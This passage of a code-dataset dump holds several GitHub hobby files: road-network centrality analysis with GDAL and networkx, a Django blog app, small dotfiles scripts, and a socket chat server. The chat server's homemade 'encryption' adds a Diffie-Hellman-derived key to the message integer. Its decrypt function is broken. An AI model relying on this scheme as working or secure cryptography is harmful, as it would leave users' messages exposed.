'no','-1')\")\n# layer.SetAttributeFilter(\"ONEWAY IN ('-1','yes','no')\")\n# get attribute list\nattributeList = []\nlayerDefinition = layer.GetLayerDefn()\nfor i in range(layerDefinition.GetFieldCount()):\n fieldName = layerDefinition.GetFieldDefn(i).GetName()\n attributeList.append(fieldName)\nattributeList.remove('TOLL')\nattributeList.remove('TRACKTYPE')\nattributeList.remove('DISUSED')\n# create graph\nG = nx.DiGraph()\nnodeList = []\ni = 0\n\nfor feature in layer:\n geometry = feature.geometry()\n geometry_projected = geometry.Clone()\n geometry_projected.TransformTo(target_srs)\n feature_length = geometry_projected.Length()\n pointCount = geometry.GetPointCount()\n pointList = geometry.GetPoints()\n ### first point ###########################################################\n firstPoint = pointList[0]\n if not firstPoint in nodeList:\n nodeList.append(firstPoint)\n G.add_node(i, lng=firstPoint[0], lat=firstPoint[1])\n firstNodeID = i\n i = i + 1\n else:\n for nodeidx in G.nodes_iter():\n if G.node[nodeidx]['lng'] == firstPoint[0] and G.node[nodeidx]['lat'] == firstPoint[1]:\n firstNodeID = nodeidx\n \n ### last point ############################################################\n lastPoint = pointList[-1]\n if not lastPoint in nodeList:\n nodeList.append(lastPoint)\n G.add_node(i, lng=lastPoint[0], lat=lastPoint[1])\n lastNodeID = i\n i = i + 1\n else:\n for nodeidx in G.nodes_iter():\n if G.node[nodeidx]['lng'] == lastPoint[0] and G.node[nodeidx]['lat'] == lastPoint[1]:\n lastNodeID = nodeidx\n \n ### if first point is same as last point, remove due to loop ##############\n if firstNodeID == lastNodeID or firstPoint == lastPoint:\n G.remove_node(firstNodeID)\n nodeList.remove(firstPoint)\n continue\n ### add edges between nodes ###############################################\n middlePointList = pointList[1:-1]\n if firstNodeID in middlePointList or lastNodeID in middlePointList:\n# G.remove_node(firstNodeID)\n# nodeList.remove(firstPoint)\n# G.remove_node(lastNodeID)\n# nodeList.remove(lastPoint)\n continue\n ### create link ###########################################################\n if feature.GetField('ONEWAY') == '-1':\n G.add_edge(lastNodeID, firstNodeID)\n for attribute in attributeList:\n G[lastNodeID][firstNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[lastNodeID][firstNodeID]['middle'] = middlePointList[::-1]\n G[lastNodeID][firstNodeID]['length'] = feature_length\n elif feature.GetField('ONEWAY') == 'yes':\n G.add_edge(firstNodeID, lastNodeID)\n for 
attribute in attributeList:\n G[firstNodeID][lastNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[firstNodeID][lastNodeID]['middle'] = middlePointList\n G[firstNodeID][lastNodeID]['length'] = feature_length\n else:\n G.add_edge(firstNodeID, lastNodeID)\n G.add_edge(lastNodeID, firstNodeID)\n for attribute in attributeList:\n G[firstNodeID][lastNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[lastNodeID][firstNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[firstNodeID][lastNodeID]['middle'] = middlePointList\n G[lastNodeID][firstNodeID]['middle'] = middlePointList[::-1]\n G[firstNodeID][lastNodeID]['length'] = feature_length\n G[lastNodeID][firstNodeID]['length'] = feature_length\n ### intersect processing ##################################################\n for edge in G.edges():\n headID = edge[0]\n tailID = edge[1]\n attributeDict = G[headID][tailID]\n middle = attributeDict['middle']\n if firstPoint in middle:\n if headID == firstNodeID or firstNodeID == tailID:\n continue\n indexFirstPoint = middle.index(firstPoint)\n # copy attributes\n attributeDictPart1 = attributeDict.copy()\n attributeDictPart2 = attributeDict.copy()\n # recalculate middle\n attributeDictPart1['middle'] = middle[0:indexFirstPoint]\n attributeDictPart2['middle'] = middle[indexFirstPoint+1:]\n # recalucate length\n roadPart1 = [(G.node[headID]['lng'],G.node[headID]['lat'])]\n roadPart1.extend(middle[0:indexFirstPoint+1])\n roadPart2 = middle[indexFirstPoint:]\n roadPart2.append((G.node[tailID]['lng'],G.node[tailID]['lat']))\n attributeDictPart1['length'] = calculateGeometryLength(roadPart1,source_srs,target_srs)\n attributeDictPart2['length'] = calculateGeometryLength(roadPart2,source_srs,target_srs)\n G.remove_edge(headID, tailID)\n G.add_edge(headID, firstNodeID, attr_dict=attributeDictPart1)\n G.add_edge(firstNodeID, tailID, attr_dict=attributeDictPart2)\n elif lastPoint in middle:\n if headID == lastNodeID or lastNodeID == tailID:\n continue\n indexLastPoint = middle.index(lastPoint)\n # copy attributes\n attributeDictPart1 = attributeDict.copy()\n attributeDictPart2 = attributeDict.copy()\n # recalculate middle\n attributeDictPart1['middle'] = middle[0:indexLastPoint]\n attributeDictPart2['middle'] = middle[indexLastPoint+1:]\n # recalculate length\n roadPart1 = [(G.node[headID]['lng'],G.node[headID]['lat'])]\n roadPart1.extend(middle[0:indexLastPoint+1])\n roadPart2 = middle[indexLastPoint:]\n roadPart2.append((G.node[tailID]['lng'],G.node[tailID]['lat']))\n attributeDictPart1['length'] = calculateGeometryLength(roadPart1,source_srs,target_srs)\n attributeDictPart2['length'] = calculateGeometryLength(roadPart2,source_srs,target_srs)\n G.remove_edge(headID, tailID)\n G.add_edge(headID, lastNodeID, attr_dict=attributeDictPart1)\n G.add_edge(lastNodeID, tailID, attr_dict=attributeDictPart2)\n\n### remove middle properties ##################################################\nfor edge in G.edges_iter():\n G[edge[0]][edge[1]].pop('middle')\n\n### remove zeros neighbor nodes ###############################################\nfor node in G.nodes():\n if G.in_degree()[node] == 0 and G.out_degree()[node] == 0:\n print(node)\n G.remove_node(node)\n### check if 2 node same lat long #############################################\nlat = G.node[0]['lat']\nlng = G.node[0]['lng']\nsameCount = -1\nfor i in G.nodes_iter():\n if G.node[i]['lat'] == lat and 
G.node[i]['lng'] == lng:\n sameCount += 1\n else:\n lat = G.node[i]['lat']\n lng = G.node[i]['lng']\nprint('same location Count: ',sameCount)\n\n### check for self loop in result graph #######################################\nself_loop_count = 0\nfor node in G.nodes_iter():\n if node in G.neighbors(node):\n self_loop_count += 1\n print(node, G.neighbors(node))\nprint('self_loop_count: ', self_loop_count)\n\n# nx.write_gexf(G,'./highway_line_singlepart.gexf')\n# nx.write_gexf(G,'./highway_line_singlepart_new_length.gexf')\n# nx.write_gexf(G,'./highway_line_singlepart_new_123.gexf')\nnx.write_gexf(G,'./graphdata/highway_line_singlepart_new_length.gexf')\n# create links between nodes\n# add metadata of links\n# save graph\n# release dataset\nlayer = None\ndataSource = None"
},
{
"alpha_fraction": 0.7142302989959717,
"alphanum_fraction": 0.732842206954956,
"avg_line_length": 36.37681198120117,
"blob_id": "a71f27da61c4990be83f8bbf7721ae66a5f9d128",
"content_id": "5633620211b1c21da140ee53fffc890374b775cf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2604,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 69,
"path": "/vietnam-highway/centrality_analysis.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 06 13:55:25 2017\n\n@author: giangblackk\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nG = nx.read_gexf('./R_VN_NHW_Inventory_1_connected_component.gexf')\n\n### betweeness centrality \nimport time\nstart_time = time.time()\n# normalized\nbetweeness_norm_dict = nx.algorithms.betweenness_centrality(G,weight='length')\nbetweeness_norm_matrix = np.array(betweeness_norm_dict.values())\nbetweeness_dict = nx.algorithms.betweenness_centrality(G,weight='length',normalized=False)\nbetweeness_matrix = np.array(betweeness_dict.values())\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n#import h5py\n#h5file = h5py.File('betweeness.h5', 'w')\n#h5file.create_dataset('betweeness_norm', data=betweeness_norm_matrix)\n#h5file.create_dataset('betweeness', data=betweeness_matrix)\n#h5file.close()\n#betweeness_matrix_sorted = np.sort(betweeness_matrix)\n\n### reopen betweeness result \n#import h5py\n#import numpy as np\n#h5f = h5py.File('betweeness.h5','r')\n#betweeness_norm = h5f['betweeness_norm'][:]\n#betweeness = h5f['betweeness'][:]\n#betweeness_norm_cdf = np.cumsum(betweeness_norm)\n#betweeness_cdf = np.cumsum(betweeness)\n\n### edge betweeness centrality\nimport time\nstart_time = time.time()\n# normalized\nedge_betweeness_norm_dict = nx.algorithms.edge_betweenness_centrality(G,weight='length')\nedge_betweeness_norm_matrix = np.array(edge_betweeness_norm_dict.values())\nedge_betweeness_dict = nx.algorithms.edge_betweenness_centrality(G,weight='length',normalized=False)\nedge_betweeness_matrix = np.array(edge_betweeness_dict.values())\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\nfor key,value in betweeness_dict.iteritems():\n G.node[key]['betweeness'] = float(value)\n\n# nx.write_gexf(G,'./R_VN_NHW_Inventory_1_connected_component_betweeness.gexf')\n# hist = np.histogram(betweeness_matrix, range=(np.amin(betweeness_matrix),np.amax(betweeness_matrix)),bins=len(betweeness_matrix)/10)\nhist = np.histogram(edge_betweeness_matrix, range=(np.amin(edge_betweeness_matrix),np.amax(edge_betweeness_matrix)),bins=len(edge_betweeness_matrix)/10)\nhist = list(hist)\n#hist[0] = hist[0]*100\n#hist[0] = hist[0]\nhist[1] = hist[1][:-1]\n\nfig, ax = plt.subplots()\nax.yaxis.grid(b=True, which='major', color='k', linestyle='--')\nax.set_axisbelow(True)\nwidth = 0.75\nrects1 = ax.bar(hist[1], hist[0], width, color='b',edgecolor='k')\nax.set_xlabel(u'Chỉ số trung tâm trung gian cho cạnh')\nax.set_ylabel(u'Số cạnh')\n# plt.title('Degree Distribution')\nplt.title(u'Thống kê tần xuất chỉ số trung tâm trung gian cho cạnh')\n"
},
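The entry above runs length-weighted betweenness over the whole highway graph; a toy check of the same networkx calls on an invented three-node graph, where the heavy a-c edge forces shortest paths through b:

import networkx as nx

G = nx.Graph()
G.add_edge('a', 'b', length=1.0)
G.add_edge('b', 'c', length=1.0)
G.add_edge('a', 'c', length=5.0)  # detour, so shortest a-c routes pass through b
print(nx.betweenness_centrality(G, weight='length'))       # b scores highest
print(nx.edge_betweenness_centrality(G, weight='length'))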
{
"alpha_fraction": 0.7204359769821167,
"alphanum_fraction": 0.7384195923805237,
"avg_line_length": 38.91304397583008,
"blob_id": "06ff73c5c203f79dce1eddbefaa6025b55269c6e",
"content_id": "189eed931ad005596285df4782fa28f2a6922bfa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1835,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 46,
"path": "/preprocess/extract_highway_nodes.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "from osgeo import ogr\n\nhighwayFileName = './highway_line_singlepart.shp'\n\ndataSource = ogr.Open(highwayFileName)\nlayer = dataSource.GetLayer(0)\nspatialRef = layer.GetSpatialRef()\nfeatureCount = layer.GetFeatureCount()\n\noutputFileName = './extract/highway_line_intersect.shp'\noutDriver = ogr.GetDriverByName('ESRI Shapefile')\noutDataSource = outDriver.CreateDataSource(outputFileName)\n\noutLayer = outDataSource.CreateLayer('highway', spatialRef, ogr.wkbPoint)\nfeatureDefn = outLayer.GetLayerDefn()\n\nnodeList = []\nfor i in range(featureCount):\n feature = layer.GetFeature(i)\n geometry = feature.geometry()\n pointCount = geometry.GetPointCount()\n firstPoint = ogr.Geometry(ogr.wkbPoint)\n lastPoint = ogr.Geometry(ogr.wkbPoint)\n lastPoint.AddPoint(geometry.GetPoint(pointCount-1)[0],geometry.GetPoint(pointCount-1)[1])\n firstPoint.AddPoint(geometry.GetPoint(0)[0],geometry.GetPoint(0)[1])\n if (geometry.GetPoint(pointCount-1)[0],geometry.GetPoint(pointCount-1)[1]) not in nodeList:\n nodeList.append((geometry.GetPoint(pointCount-1)[0],geometry.GetPoint(pointCount-1)[1]))\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(firstPoint)\n outLayer.CreateFeature(outFeature)\n if (geometry.GetPoint(0)[0],geometry.GetPoint(0)[1]) not in nodeList:\n nodeList.append((geometry.GetPoint(0)[0],geometry.GetPoint(0)[1]))\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(lastPoint)\n outLayer.CreateFeature(outFeature)\n# print('firstPoint: ',firstPoint)\n# print('lastPoint:', lastPoint)\n# nodeList.add((geometry.GetPoint(pointCount-1)[0],geometry.GetPoint(pointCount-1)[1]))\n# nodeList.add((geometry.GetPoint(0)[0],geometry.GetPoint(0)[1]))\n\nprint(len(nodeList))\n\noutLayer = None\noutDataSource = None\nlayer = None\ndataSource = None"
},
{
"alpha_fraction": 0.738779604434967,
"alphanum_fraction": 0.7539082169532776,
"avg_line_length": 34.41071319580078,
"blob_id": "e66ecf0e45f58b0e0bd1f2be86c82bf502fa7d7b",
"content_id": "86629a6486a85d4fd55f5bdbb3d6a33578d08275",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1983,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 56,
"path": "/preprocess/centralities.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 23 16:31:38 2017\n\n@author: giangblackk\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nG = nx.read_gexf('/home/giangblackk/Dropbox/DATN/hanoi_road_map_analysis/preprocess/graphdata/highway_line_singlepart_new_length.gexf')\n\n### betweeness centrality \nimport time\nstart_time = time.time()\n# normalized\nbetweeness_norm_dict = nx.algorithms.betweenness_centrality(G,weight='length')\nbetweeness_norm_matrix = np.array(betweeness_norm_dict.values())\nbetweeness_dict = nx.algorithms.betweenness_centrality(G,weight='length',normalized=False)\nbetweeness_matrix = np.array(betweeness_dict.values())\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n# np.save('./betweeness_norm_matrix.npy', betweeness_norm_matrix)\n# np.save('./betweeness_matrix.npy', betweeness_matrix)\n\nimport h5py\nh5file = h5py.File('betweeness.h5', 'w')\nh5file.create_dataset('betweeness_norm', data=betweeness_norm_matrix)\nh5file.create_dataset('betweeness', data=betweeness_matrix)\nh5file.close()\n\n### reopen betweeness result \nimport h5py\nimport numpy as np\nh5f = h5py.File('betweeness.h5','r')\nbetweeness_norm = h5f['betweeness_norm'][:]\nbetweeness = h5f['betweeness'][:]\nbetweeness_norm_cdf = np.cumsum(betweeness_norm)\nbetweeness_cdf = np.cumsum(betweeness)\n\n\n### edge betweeness centrality\nimport time\nstart_time = time.time()\n# normalized\nedge_betweeness_norm_dict = nx.algorithms.edge_betweenness_centrality(G,weight='length')\nedge_betweeness_norm_matrix = np.array(edge_betweeness_norm_dict.values())\nedge_betweeness_dict = nx.algorithms.edge_betweenness_centrality(G,weight='length',normalized=False)\nedge_betweeness_matrix = np.array(edge_betweeness_dict.values())\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\nedge_betweeness_norm_cdf = np.cumsum(edge_betweeness_norm_matrix)\nedge_betweeness_cdf = np.cumsum(edge_betweeness_matrix)\n\nhist = np.histogram(betweeness, bins=100,normed=True)\n"
},
{
"alpha_fraction": 0.7365010976791382,
"alphanum_fraction": 0.7429805397987366,
"avg_line_length": 50.33333206176758,
"blob_id": "c0f9ad88d46cd077f5c197841e43bdae7f75cc0b",
"content_id": "ac02d9f4141b8feb9a7c6bf0d39cf6e374d16ac5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 463,
"license_type": "permissive",
"max_line_length": 316,
"num_lines": 9,
"path": "/vietnam-highway/.spyproject/workspace.ini",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "[workspace]\nsave_data_on_exit = True\nrestore_data_on_startup = True\nsave_history = True\nsave_non_project_files = False\n\n[main]\nversion = '0.1.0'\nrecent_files = [u'E:\\\\MyWorkspace\\\\DATN\\\\final\\\\hanoi_road_map_analysis\\\\vietnam-highway\\\\centrality_analysis.py', u'E:\\\\MyWorkspace\\\\DATN\\\\final\\\\hanoi_road_map_analysis\\\\vietnam-highway\\\\from_vn_highway_to_graph.py', u'E:\\\\MyWorkspace\\\\DATN\\\\final\\\\hanoi_road_map_analysis\\\\vietnam-highway\\\\histogram_analysis.py']\n\n"
}
] | 13 |
SF97/dotfiles
|
https://github.com/SF97/dotfiles
|
976e7e0d6f56f9db990f6e802f533636dac36d8c
|
6ea076b549a89ee9699d577b726de9e0e9857b8e
|
1ce662f3e151c0218b55bc5f1aa0ed5f6dae787e
|
refs/heads/master
| 2020-05-17T12:10:52.397853 | 2019-09-29T14:49:55 | 2019-09-29T14:49:55 | 183,704,736 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6927374005317688,
"alphanum_fraction": 0.6983240246772766,
"avg_line_length": 24.571428298950195,
"blob_id": "cf8f81f45050430772bc744dae5df509fb12b6bf",
"content_id": "2921a3cf883cbd8c8b77789442fbd1c17d7bd991",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 14,
"path": "/.config/scripts/enable_apt_sources.py",
"repo_name": "SF97/dotfiles",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n\nimport aptsources.sourceslist as sl\nimport lsb_release\n\ncodename = lsb_release.get_distro_information()['CODENAME']\nsources = sl.SourcesList()\n\nfor source in sources.list:\n if source.comment.lower().find(\"disabled on upgrade\") >= 0:\n source.dist = codename\n source.set_enabled(True)\n print(source)\nsources.save()\n"
},
{
"alpha_fraction": 0.7592592835426331,
"alphanum_fraction": 0.7685185074806213,
"avg_line_length": 35,
"blob_id": "bd1314a9e9fcc346576a0042bcf940e2adc6801c",
"content_id": "bc1ac68c99dfb5a6c7a4c3188747fab69153bf4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 3,
"path": "/.config/polybar/scripts/spotify/launchlistener.sh",
"repo_name": "SF97/dotfiles",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env sh\n\n/usr/bin/env python3 /home/filipe/.config/polybar/scripts/spotify/py_spotify_listener.py\n"
},
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 13,
"blob_id": "c113748e24a95b24964331d5d518a8d65a6fdcc8",
"content_id": "23add8e894944daffb21c2f30b3a576d0f793506",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 3,
"path": "/README.md",
"repo_name": "SF97/dotfiles",
"src_encoding": "UTF-8",
"text": "# dotfiles\n\nMy dotfiles. Managed via yadm\n"
}
] | 3 |
pintoderian/blogdjango
|
https://github.com/pintoderian/blogdjango
|
9eb9d530f20b566148a5398d0a1d21caca397e20
|
99441171ee8ff8786fa940205628f9aeaeb74979
|
d900091884ca666f594d178a25673327db0d2d5b
|
refs/heads/master
| 2020-03-14T18:10:10.118001 | 2018-05-04T22:57:20 | 2018-05-04T22:57:20 | 131,736,079 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6915113925933838,
"alphanum_fraction": 0.6915113925933838,
"avg_line_length": 31.266666412353516,
"blob_id": "931258d5340eb25c8f931f92b3da55835af3fbf4",
"content_id": "3e4c4e6fbac3597a2730a0265fa19169fa5d514e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 484,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 15,
"path": "/posts/admin.py",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Post \n#importanción relativa\n\n# Register your models here.\nclass PostModelAdmin(admin.ModelAdmin):\n list_display = ('__str__','actualizado', 'timestamp')\n #list_display_links = [\"actualizado\"] para que el link este en la fecha y no en el titulo\n list_filter = ['timestamp']\n search_fields = ['titulo', 'contenido']\n exclude = ('slug',)\n class Meta:\n model = Post\n\nadmin.site.register(Post, PostModelAdmin)"
},
{
"alpha_fraction": 0.5335752964019775,
"alphanum_fraction": 0.5680580735206604,
"avg_line_length": 22.95652198791504,
"blob_id": "186059f20d680a474246cae3f989e86bf37c2f55",
"content_id": "c7e39313a21fb682311571be6c750d30e1e232ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 551,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 23,
"path": "/posts/migrations/0003_auto_20180501_2130.py",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.4 on 2018-05-02 02:30\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('posts', '0002_remove_post_slug'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='actualizado',\n field=models.DateTimeField(auto_now=True),\n ),\n migrations.AlterField(\n model_name='post',\n name='timestamp',\n field=models.DateTimeField(auto_now_add=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7147887349128723,
"alphanum_fraction": 0.7253521084785461,
"avg_line_length": 15.72549057006836,
"blob_id": "1901530832c1abd6c51f7b3957a6d4b2d5a5dd45",
"content_id": "29658db4e96f9ea19479331554903b6459211498",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 51,
"path": "/README.md",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "# Blog con Python 3 + Django\n\nAlgunos comandos de utilidad\n-\n\n```\nvirtualenv blog-django o virtualenv .\n```\n\n (dentro de la carpeta del proyecto)\n```\n.\\Scripts\\activate\npip install django\n```\n```\npython .\\Scripts\\django-admin.py startproject blogdjango \n```\n(con esto salen las opciones ejemplo: migraciones startproject y demás)\n```\npython .\\Scripts\\django-admin.py\n```\n```\ncd blogdjango\n```\n\n```\npython manage.py runserver\n``` \nSi se pones 8001 al final nos da otro puerto\n\n```\npython manage.py migrate (Migraciones)\n```\nCrear super usuario (Antes de eso hacer las migraciones)\n```\npython manage.py createsuperuser Ejem admin - arrow1995\n```\n\nCreando app python\n```\npython manage.py startapp posts\n```\nMigraciones a modelos\n```\npython manage.py makemigrations\npython manage.py migrate\n```\nArchivos estaticos\n```\npython manage.py collectstatic\n```"
},
{
"alpha_fraction": 0.6315289735794067,
"alphanum_fraction": 0.6419752836227417,
"avg_line_length": 29.114286422729492,
"blob_id": "d631d0c8385465a68ee73386672de134ffc1b082",
"content_id": "1b2cadbd9c30e931e0acbabd18e4774323986160",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1053,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 35,
"path": "/posts/views.py",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse #importado\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render, get_object_or_404\nfrom django.db.models import Q\nfrom .models import Post\n# Create your views here.\ndef post_home(request):\n #return HttpResponse(\"<h1>Post home!</h1>\")\n query = Post.objects.all()\n buscar = request.GET.get('q')\n if buscar:\n query = query.filter(\n Q(titulo__icontains=buscar)|\n Q(contenido__icontains=buscar)\n ).distinct()\n \n paginator = Paginator(query, 5)\n\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n\n context = {\n \"titulo\": \"Blog con Django\",\n \"posts\": posts\n }\n return render(request, \"index.html\", context)\n\ndef post_detail(request, slug=None):\n #return HttpResponse(\"<h1>Post home!</h1>\")\n query = get_object_or_404(Post, slug=slug)\n context = {\n \"titulo\": query.titulo,\n \"post\": query\n }\n return render(request, \"post.html\", context)"
},
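post_home above combines a Q-object icontains filter with Paginator. A shell-style sketch of the same query pattern (run inside manage.py shell so Django is configured; the search term is illustrative):

from django.db.models import Q
from posts.models import Post

q = 'django'  # illustrative search term
results = Post.objects.filter(
    Q(titulo__icontains=q) | Q(contenido__icontains=q)
).distinct()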
{
"alpha_fraction": 0.6837242245674133,
"alphanum_fraction": 0.6865671873092651,
"avg_line_length": 35.0512809753418,
"blob_id": "337a2218231a0b42e101faa9bccc031ba1ed546e",
"content_id": "3d69aaffabf3856c8ca4ca79ece57d985a8dbc95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1407,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 39,
"path": "/posts/models.py",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.db.models.signals import pre_save\nfrom django.utils.text import slugify\nclass Post(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, default=1, on_delete=models.CASCADE)\n titulo = models.CharField(max_length=150)\n imagen = models.FileField(null=True,blank=True)\n slug = models.SlugField(unique=True)\n contenido = models.TextField()\n timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)\n actualizado = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n def __str__(self):\n return '%s' % self.titulo\n \n def get_absolute_url(self):\n return reverse(\"detail\", kwargs={\"slug\": self.slug})\n\n class Meta:\n ordering = [\"-timestamp\", \"-actualizado\"]\n#creando slug en el modelo\ndef create_slug(instance, new_slug=None):\n slug = slugify(instance.titulo)\n if new_slug is not None:\n slug = new_slug\n qs = Post.objects.filter(slug=slug).order_by(\"-id\")\n exists = qs.exists()\n if exists:\n new_slug = \"%s-%s\" %(slug, qs.first().id)\n return create_slug(instance, new_slug=new_slug)\n return slug\n\ndef pre_save_post_receiver(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = create_slug(instance)\n\npre_save.connect(pre_save_post_receiver, sender=Post)\n\n"
}
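create_slug above retries with an appended suffix until the slug is unique. A database-free sketch of the same idea, replacing the Post queryset with a plain set and the clashing record's id with a fixed '-2' suffix — the names and that simplification are illustrative, not the app's exact behavior:

from django.utils.text import slugify

def unique_slug(title, existing, new_slug=None):
    slug = new_slug or slugify(title)
    if slug in existing:
        # the real model appends the clashing record's id instead of '2'
        return unique_slug(title, existing, new_slug='%s-2' % slug)
    return slug

print(unique_slug('Mi primer post', {'mi-primer-post'}))  # -> mi-primer-post-2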
] | 5 |
nickyfoster/pycryptochat
|
https://github.com/nickyfoster/pycryptochat
|
bcc902ebd4c1fa25a1b04c6a58f7508d3c83edc6
|
0d56ed2c64647975516188b44d38ed99310cf723
|
33de6db1fd70f2158040bec39c36bc9a0249ba8d
|
refs/heads/master
| 2020-04-30T23:41:57.491530 | 2019-03-22T14:22:19 | 2019-03-22T14:22:19 | 177,150,510 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5388162732124329,
"alphanum_fraction": 0.5687932372093201,
"avg_line_length": 21.05084800720215,
"blob_id": "643ca35476911d73caf241cdcc2b39615994920e",
"content_id": "f497bca0f6022f79c2947b5e1981ffcf7130503f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1301,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 59,
"path": "/serverRSA.py",
"repo_name": "nickyfoster/pycryptochat",
"src_encoding": "UTF-8",
"text": "import socket\nimport random\nimport sys\nfrom time import sleep\n\ndef encrypt(text, key):\n global encrypted\n encrypted = int.from_bytes(text.encode('utf-8'), byteorder='big')\n encrypted = encrypted + key\n return encrypted\n\ndef decrypt(encrypted, key):\n encrypted = encrypted - key\n s = encrypted.to_bytes(encrypted, length=len(strg), byteorder='big').decode('utf-8')\n return text\n\ndef crypt(host,port,c):\n y = 121\n p = 22344323423\n secret = random.randint(1,499)\n alpha = str(int((pow(y,secret) % p)))\n\n c.sendto(alpha.encode(),(host,port))\n\n beta = int(c.recv(1024).decode('UTF-8'))\n\n key = pow(beta,secret) % p\n print(\"KEY: \" +str(key))\n return key\n\n\ndef Main():\n host = 'localhost'\n port = int(sys.argv[1])\n key = 1\n\n s = socket.socket()\n s.bind((host, port))\n\n s.listen(3)\n c, addr = s.accept()\n print(\"Connection from: \" + str(addr))\n\n while True:\n\n data = c.recv(1024).decode('UTF-8')\n data = decrypt(int(data),key)\n\n if data == 'h172hdx120o':\n key = crypt(host,port,c)\n else:\n print(\"Bob: \" + str(data))\n data = input(\"-> \")\n data = encrypt(data,key)\n c.sendto(data.encode(),(host,port))\n c.close\n\nif __name__ == '__main__':\n Main()\n"
},
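Despite the RSA filenames, the crypt routines above perform a Diffie-Hellman-style exchange over generator y = 121 and modulus p = 22344323423, then shift message bytes by the shared key. A self-contained sketch showing that both sides derive the same key and that the additive scheme round-trips; the constants and secret ranges come from the scripts, everything else is illustrative:

import random

y, p = 121, 22344323423  # generator and modulus from the scripts above

a = random.randint(1, 499)     # server-side secret range used above
b = random.randint(500, 1000)  # client-side secret range used above
alpha, beta = pow(y, a, p), pow(y, b, p)
assert pow(beta, a, p) == pow(alpha, b, p)  # both sides agree on the key
key = pow(beta, a, p)

def encrypt(text, key):
    return int.from_bytes(text.encode('utf-8'), 'big') + key

def decrypt(n, key):
    n -= key
    return n.to_bytes((n.bit_length() + 7) // 8, 'big').decode('utf-8')

assert decrypt(encrypt('hello', key), key) == 'hello'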
{
"alpha_fraction": 0.6249130368232727,
"alphanum_fraction": 0.6346555352210999,
"avg_line_length": 21.453125,
